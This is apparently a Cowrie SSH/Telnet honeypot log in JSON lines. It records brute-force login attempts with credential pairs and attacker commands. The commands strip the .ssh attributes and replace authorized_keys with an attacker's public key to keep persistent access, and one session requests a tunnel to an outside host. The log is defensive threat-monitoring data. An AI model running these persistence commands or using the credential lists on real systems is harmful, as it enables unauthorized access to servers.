-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:58:05.374652Z","src_ip":"212.227.235.229","session":"0dbe050ffa0c"}
{"eventid":"cowrie.login.success","username":"root","password":"password@2024","message":"login attempt [root/password@2024] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:58:05.669289Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:58:06.103590Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:58:06.104341Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:58:06.105221Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:58:06.312912Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.login.failed","username":"es","password":"abc123","message":"login attempt [es/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:58:06.332180Z","src_ip":"212.227.235.229","session":"0dbe050ffa0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:58:06.792202Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:58:06.792888Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:58:07.001797Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:58:07.002849Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53948,"dst_ip":"1.2.3.4","dst_port":22,"session":"e095243bfea0","protocol":"ssh","message":"New connection: 212.227.235.229:53948 (1.2.3.4:22) [session: e095243bfea0]","sensor":"my-vps","timestamp":"2025-08-28T15:58:07.224466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:58:07.225364Z","src_ip":"212.227.235.229","session":"e095243bfea0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:58:07.439995Z","src_ip":"212.227.235.229","session":"e095243bfea0"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:58:07.560284Z","src_ip":"212.227.235.229","session":"0dbe050ffa0c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:58:08.342143Z","src_ip":"212.227.235.229","session":"e095243bfea0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:58:09.559261Z","src_ip":"212.227.235.229","session":"e095243bfea0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53962,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c415067b626","protocol":"ssh","message":"New connection: 212.227.235.229:53962 (1.2.3.4:22) [session: 4c415067b626]","sensor":"my-vps","timestamp":"2025-08-28T15:58:09.774543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:58:09.775237Z","src_ip":"212.227.235.229","session":"4c415067b626"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:58:09.991634Z","src_ip":"212.227.235.229","session":"4c415067b626"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:58:10.899745Z","src_ip":"212.227.235.229","session":"4c415067b626"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:58:11.108172Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:58:11.116968Z","src_ip":"212.227.235.229","session":"4c415067b626"}
{"eventid":"cowrie.session.connect","src_ip":"175.110.65.134","src_port":51846,"dst_ip":"1.2.3.4","dst_port":22,"session":"76c6c261ad59","protocol":"ssh","message":"New connection: 175.110.65.134:51846 (1.2.3.4:22) [session: 76c6c261ad59]","sensor":"my-vps","timestamp":"2025-08-28T15:58:20.906376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-28T15:58:20.907397Z","src_ip":"175.110.65.134","session":"76c6c261ad59"}
{"eventid":"cowrie.client.kex","hassh":"14b2ddda386a4d1006108ccd231b42fc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 14b2ddda386a4d1006108ccd231b42fc","sensor":"my-vps","timestamp":"2025-08-28T15:58:20.931973Z","src_ip":"175.110.65.134","session":"76c6c261ad59"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T15:58:21.055080Z","src_ip":"175.110.65.134","session":"76c6c261ad59"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:58:22.307572Z","src_ip":"175.110.65.134","session":"76c6c261ad59"}
{"eventid":"cowrie.session.closed","duration":30.743810415267944,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:58:23.716975Z","src_ip":"212.227.235.229","session":"2834692c432a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41833,"dst_ip":"1.2.3.4","dst_port":23,"session":"29584a6d90c3","protocol":"telnet","message":"New connection: 212.227.125.160:41833 (1.2.3.4:23) [session: 29584a6d90c3]","sensor":"my-vps","timestamp":"2025-08-28T15:58:29.718549Z"}
{"eventid":"cowrie.session.closed","duration":33.6424834728241,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:03.360961Z","src_ip":"212.227.125.160","session":"29584a6d90c3"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":53268,"dst_ip":"1.2.3.4","dst_port":22,"session":"a44312088abf","protocol":"ssh","message":"New connection: 80.94.95.112:53268 (1.2.3.4:22) [session: a44312088abf]","sensor":"my-vps","timestamp":"2025-08-28T15:59:10.193089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:59:10.193926Z","src_ip":"80.94.95.112","session":"a44312088abf"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:59:10.224379Z","src_ip":"80.94.95.112","session":"a44312088abf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29121993","message":"login attempt [admin/29121993] failed","sensor":"my-vps","timestamp":"2025-08-28T15:59:10.426593Z","src_ip":"80.94.95.112","session":"a44312088abf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53254,"dst_ip":"1.2.3.4","dst_port":22,"session":"db0b8a6a679b","protocol":"ssh","message":"New connection: 212.227.235.229:53254 (1.2.3.4:22) [session: db0b8a6a679b]","sensor":"my-vps","timestamp":"2025-08-28T15:59:11.302625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:59:11.304471Z","src_ip":"212.227.235.229","session":"db0b8a6a679b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29111980","message":"login attempt [admin/29111980] failed","sensor":"my-vps","timestamp":"2025-08-28T15:59:11.458311Z","src_ip":"80.94.95.112","session":"a44312088abf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:59:11.625387Z","src_ip":"212.227.235.229","session":"db0b8a6a679b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29101993","message":"login attempt [admin/29101993] failed","sensor":"my-vps","timestamp":"2025-08-28T15:59:12.490466Z","src_ip":"80.94.95.112","session":"a44312088abf"}
{"eventid":"cowrie.login.failed","username":"john","password":"john","message":"login attempt [john/john] failed","sensor":"my-vps","timestamp":"2025-08-28T15:59:12.925991Z","src_ip":"212.227.235.229","session":"db0b8a6a679b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29061992","message":"login attempt [admin/29061992] failed","sensor":"my-vps","timestamp":"2025-08-28T15:59:13.522868Z","src_ip":"80.94.95.112","session":"a44312088abf"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:14.243913Z","src_ip":"212.227.235.229","session":"db0b8a6a679b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29051982","message":"login attempt [admin/29051982] failed","sensor":"my-vps","timestamp":"2025-08-28T15:59:14.554717Z","src_ip":"80.94.95.112","session":"a44312088abf"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:15.588477Z","src_ip":"80.94.95.112","session":"a44312088abf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51918,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b92a56e0ff2","protocol":"ssh","message":"New connection: 212.227.125.160:51918 (1.2.3.4:22) [session: 0b92a56e0ff2]","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.106361Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.107973Z","src_ip":"212.227.125.160","session":"0b92a56e0ff2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52197,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1bdfa745cd0","protocol":"ssh","message":"New connection: 212.227.125.160:52197 (1.2.3.4:22) [session: a1bdfa745cd0]","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.217416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.218755Z","src_ip":"212.227.125.160","session":"a1bdfa745cd0"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.331564Z","src_ip":"212.227.125.160","session":"a1bdfa745cd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42026,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f84772aa12c","protocol":"ssh","message":"New connection: 212.227.235.229:42026 (1.2.3.4:22) [session: 7f84772aa12c]","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.531661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.532321Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.671398Z","src_ip":"212.227.125.160","session":"a1bdfa745cd0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.751278Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T15:59:16.785543Z","session":"a1bdfa745cd0"}
{"eventid":"cowrie.login.success","username":"root","password":"Wk123456.","message":"login attempt [root/Wk123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:59:17.668735Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:59:18.125655Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:59:18.126342Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:59:18.127540Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
